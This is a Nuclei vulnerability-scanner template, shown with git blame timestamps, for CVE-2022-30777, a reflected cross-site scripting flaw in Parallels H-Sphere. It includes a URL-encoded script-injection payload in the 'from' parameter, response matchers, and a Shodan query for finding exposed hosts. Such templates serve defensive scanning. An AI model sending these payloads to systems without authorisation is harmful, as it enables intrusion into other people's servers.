nuclei-templates/http/cves/2022/CVE-2022-30777.yaml

54 lines
1.8 KiB
YAML
Raw Normal View History

2022-05-17 11:43:11 +00:00
id: CVE-2022-30777
info:
name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting
2022-05-17 11:43:11 +00:00
author: 3th1c_yuk1
severity: medium
description: |
Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
2022-05-17 11:43:11 +00:00
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
- https://en.wikipedia.org/wiki/H-Sphere
- https://nvd.nist.gov/vuln/detail/CVE-2022-30777
- https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-30777
cwe-id: CWE-79
epss-score: 0.00117
epss-percentile: 0.45423
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:*
2022-06-30 12:38:21 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: parallels
product: h-sphere
2023-09-06 11:59:08 +00:00
shodan-query: title:"h-sphere"
2022-06-30 12:38:21 +00:00
tags: cve,cve2022,parallels,hsphere,xss
2022-05-17 11:43:11 +00:00
http:
2022-05-17 11:43:11 +00:00
- method: GET
path:
2022-06-30 12:38:21 +00:00
- '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-05-17 11:43:11 +00:00
2022-06-30 12:38:21 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-05-17 11:43:11 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-06-30 12:38:21 +00:00
- '<TITLE>"><script>alert(document.domain)</script>'
2022-05-17 11:43:11 +00:00
- type: word
part: header
words:
- "text/html"
2022-06-30 12:38:21 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502210083b732e53a1ac35665cbfd266552786db591a31d04fd67c4ef0ac81212df7941022045f03d8a1898763fea9fc36716edcccef99f329979f35421b42dcf5dccc1427a:922c64590222798bb761d5b6d8e72950